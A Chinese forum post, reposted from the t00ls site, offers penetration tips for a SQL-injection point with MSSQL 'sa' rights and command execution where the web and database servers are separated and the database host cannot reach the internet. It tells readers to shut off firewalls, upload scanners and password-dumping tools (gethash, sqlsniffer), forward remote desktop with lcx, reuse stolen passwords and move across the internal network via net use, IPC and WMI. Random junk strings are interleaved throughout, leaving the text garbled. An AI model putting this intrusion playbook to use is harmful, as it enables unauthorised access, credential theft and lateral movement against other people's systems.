当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
, x2 R6 h& M) S+ J4 F! ^- u5 q! U0 u1 T6 l" n' S
7 P' ^& B# K1 K, R9 m* _6 G( H3 F5 o0 d- E6 @
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)4 X7 n, Y0 E8 v' l
9 M8 Y1 H# J0 N- S% h3 q( o; K( M- ]. U; l* m
一、DB机有公网IP.3 M' ~* Y9 C( N
' {3 N; B0 T. K# B; z$ z1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
+ ^6 v3 z% P+ N# T- W8 s. L- S) v
& z! D, [3 J7 M; W7 s8 `. C
8 Q# C+ C- R; t6 A( W, B2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389., J# j- F- K% v% {1 n- p, G' l
- Z9 ~! Z! O/ z/ H3 P4 K; { \: s) Z
% i, J$ R6 W& E* r1 ?5 g3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com" B* m# C S w3 p- E! K3 M- I
( Y( ^+ J$ J1 V. |, C
/ Q+ n1 k7 h- k$ Y2 E, _
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.7 c) w* h- h& e# i! l
; a: x2 p8 |6 G# w5 O) c4 R7 G/ `7 P
6 ^* W% C( f8 f
二、DB机只有内网IP
" h) g4 q1 l. s1 l0 x6 E* o( [0 P* L" `$ O3 S
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.4 B" V, r0 U* a2 Q5 ~
: Q4 {, ^& ~; [! Y$ @: U4 O
& v: {+ \. c' j8 V) g- {/ X
2:停掉防火墙和IP策略再从内往外扫描. S5 J0 r" {5 y3 S
5 G# q* n6 A' i$ W$ N
, X; |7 Z( J' t, y3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
5 A, e! ^) l! M, K2 c8 `
5 \1 R% t8 r; s
& H! H/ N4 G9 D2 O0 R: ?/ g4:学会密码规律分析往往会有惊喜.
# z3 }: A3 x7 k6 y- o' |9 @
- W! @5 h. _% X, h: z1 l P/ q% N0 q6 [* j$ t$ b
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等6 `0 t" M& d% c
3 w: G6 k$ U9 ~5 l+ W' F% s6 v
5 _6 V% \: E5 ~/ `
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |